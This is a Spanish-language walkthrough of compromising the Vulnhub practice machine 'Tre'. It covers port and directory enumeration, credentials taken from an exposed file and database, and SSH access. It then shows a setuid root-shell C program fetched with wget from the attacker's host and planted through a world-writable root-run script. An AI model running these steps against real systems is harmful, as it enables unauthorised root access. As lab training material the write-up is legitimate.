__    _____        _____     _____ _ _____
        |  |  |  _  |   ___|  _  |___|  |  |_|_   _|___
        |  |__|     |  |  _|     |_ -|     | | | | | .'| 
        |_____|__|__|  |___|__|__|___|__|__|_| |_| |__,|
			hola@lacashita.com

 
 

[VLN] Tre

Hoy vamos a hackear la maquina de Vulnhub llamada Tre. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/tre-1,483/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    sml@m0nique:~$ nmap -A -p- 192.168.112.130 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-18 12:40 CEST Nmap scan report for 192.168.112.130 Host is up (0.0010s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 99:1a:ea:d7:d7:b3:48:80:9f:88:82:2a:14:eb:5f:0e (RSA) | 256 f4:f6:9c:db:cf:d4:df:6a:91:0a:81:05:de:fa:8d:f8 (ECDSA) |_ 256 ed:b9:a9:d7:2d:00:f8:1b:d3:99:d6:02:e5:ad:17:9f (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Tre 8082/tcp open http nginx 1.14.2 |_http-server-header: nginx/1.14.2 |_http-title: Tre Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 23.16 seconds
    Echamos un vistazo al Apache... (puerto 80)
    sml@m0nique:~$ gobuster dir -u http://192.168.112.130 -w /usr/share/wordlists/dirb/big.txt -x php,html,htm,txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.112.130 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: php,html,htm,txt [+] Timeout: 10s =============================================================== 2020/05/18 12:42:09 Starting gobuster =============================================================== /.htpasswd (Status: 403) /.htpasswd.php (Status: 403) /.htpasswd.html (Status: 403) /.htpasswd.htm (Status: 403) /.htpasswd.txt (Status: 403) /.htaccess (Status: 403) /.htaccess.htm (Status: 403) /.htaccess.txt (Status: 403) /.htaccess.php (Status: 403) /.htaccess.html (Status: 403) /adminer.php (Status: 200) /cms (Status: 301) /index.html (Status: 200) /info.php (Status: 200) /mantisbt (Status: 301) /server-status (Status: 403) /system (Status: 401) =============================================================== 2020/05/18 12:42:19 Finished ===============================================================
    Vemos la carpeta /mantisbt, asi que vamos a indagar un poco mas...
    sml@m0nique:~$ gobuster dir -u http://192.168.112.130/mantisbt/ -w /usr/share/wordlists/dirb/big.txt -x php,html,htm,txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.112.130/mantisbt/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: php,html,htm,txt [+] Timeout: 10s =============================================================== 2020/05/18 12:47:24 Starting gobuster =============================================================== /.htpasswd (Status: 403) /.htpasswd.php (Status: 403) /.htpasswd.html (Status: 403) /.htpasswd.htm (Status: 403) /.htpasswd.txt (Status: 403) /.htaccess (Status: 403) /.htaccess.php (Status: 403) /.htaccess.html (Status: 403) /.htaccess.htm (Status: 403) /.htaccess.txt (Status: 403) /admin (Status: 301) /api (Status: 301) /bug_report.php (Status: 200) /config (Status: 301) /css (Status: 301) /core (Status: 301) /core.php (Status: 200) /doc (Status: 301) /file_download.php (Status: 302) /fonts (Status: 301) /images (Status: 301) /index.php (Status: 302) /js (Status: 301) /lang (Status: 301) /library (Status: 301) /login.php (Status: 302) /main_page.php (Status: 302) /plugins (Status: 301) /plugin.php (Status: 200) /scripts (Status: 301) /search.php (Status: 302) /signup.php (Status: 200) /vendor (Status: 301) /view.php (Status: 200) /verify.php (Status: 200) /wiki.php (Status: 200) =============================================================== 2020/05/18 12:47:35 Finished ===============================================================
    En http://192.168.112.130/mantisbt/config/a.txt podemos encontrar unos credenciales que podemos utilizar en http://192.168.112.130/adminer.php. Nos logueamos en "adminer.php" con los credenciales y vamos a "select mantis_user_table", despus a "select data". Ahi encontraremos usuarios/passwords.
  • Low Shell
  • Probamos a conectar por ssh con el usuario tre y el password que hemos encontrado (Tr3@123456A!).
    sml@m0nique:~$ ssh tre@192.168.112.130 tre@192.168.112.130's password: Linux tre 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Mon May 18 14:39:58 2020 from 192.168.112.128 tre@tre:~$
    Estamos dentro :) Miramos si tenemos algo especial, que podamos ejecutar con sudo.
    tre@tre:/tmp$ sudo -l Matching Defaults entries for tre on tre: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User tre may run the following commands on tre: (ALL) NOPASSWD: /sbin/shutdown
    Podemos ejecutar shutdown.... Por otro lado, mirando los procesos, vemos que hay uno que llama la atencion.
    tre@tre:~$ ps aux | grep check root 391 0.0 0.1 6728 3288 ? Ss 06:38 0:02 /bin/bash /usr/bin/check-system tre 35106 0.0 0.0 6208 892 pts/1 S+ 08:03 0:00 grep check tre@tre:~$ ls -l /usr/bin/check-system -rw----rw- 1 root root 135 May 12 04:08 /usr/bin/check-system
    Al parecer /bin/bash /usr/bin/check-system se ejecuta como root, y tenemos permisos de lectura/escritura sobre el. Echamos un vistazo al fichero:
    tre@tre:~$ cat /usr/bin/check-system DATE=`date '+%Y-%m-%d %H:%M:%S'` echo "Service started at ${DATE}" | systemd-cat -p info while : do echo "Checking..."; sleep 1; done
    Vemos que es un script sencillito.
  • Privilege Escalation
  • Sabiendo esto, en nuestra maquina vamos a compilar una rootshell, que luego nos descargaremos en la maquina victima. El codigo de la rootshell es el siguiente:
    sml@m0nique:/var/www/html$ cat rootshell.c // gcc -o /tmp/rootshell /tmp/rootshell.c // chmod u+s /tmp/rootshell #include #include #include int main(void) { setuid(0); setgid(0); system("/bin/bash"); }
    La compilamos:
    root@m0nique:/var/www/html# gcc -o rootshell rootshell.c
    Arrancamos el servidor web para hacer accesible el binario "rootshell" y nos lo descargamos en la maquina "victima", en este caso en /home/tre/rootshell.
    tre@tre:~$ wget http://192.168.112.128/rootshell --2020-05-18 14:38:37-- http://192.168.112.128/rootshell Connecting to 192.168.112.128:80... connected. HTTP request sent, awaiting response... 200 OK Length: 16712 (16K) [application/octet-stream] Saving to: ‘rootshell’ rootshell 100%[=======================>] 16.32K --.-KB/s in 0s 2020-05-18 14:38:37 (422 MB/s) - ‘rootshell’ saved [16712/16712]
    Editamos el fichero "/usr/bin/check-system", y agregamos las lineas necesarias para que rootshell tenga SUID, su propietario sea root y pueda ser ejecutado por "tre", de ese modo al ejecutarlo pasaremos a ser root...
    tre@tre:~$ nano /usr/bin/check-system
    Quedaria asi:
    tre@tre:~$ cat /usr/bin/check-system DATE=`date '+%Y-%m-%d %H:%M:%S'` echo "Service started at ${DATE}" | systemd-cat -p info chown root:tre /home/tre/rootshell chmod +x /home/tre/rootshell chmod +s /home/tre/rootshell while : do echo "Checking..."; sleep 1; done
    Reiniciamos la maquina para que se ejecute /usr/bin/check-system con los cambios que hemos realizado.
    tre@tre:~$ sudo shutdown -r now
    Volvemos a conectar, y comprobamos:
    sml@m0nique:~$ ssh tre@192.168.112.130 tre@192.168.112.130's password: Linux tre 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Mon May 18 14:36:31 2020 from 192.168.112.128 tre@tre:~$ ls -l total 20 -rwsr-sr-x 1 root tre 16712 May 18 14:38 rootshell
    Vemos que esta tal y como lo necesitabamos asi que...
    tre@tre:~$ ./rootshell root@tre:~# id uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109( netdev),1000(tre) root@tre:~# whoami root root@tre:~# hostname tre
  • root.txt
  • root@tre:~# cd /root root@tre:/root# ls root.txt root@tre:/root# cat root.txt {SunCSR_Tr3_Viet_Nam_2020} root@tre:/root#
  • End
  • Y con esto ya seriamos root de la maquina :)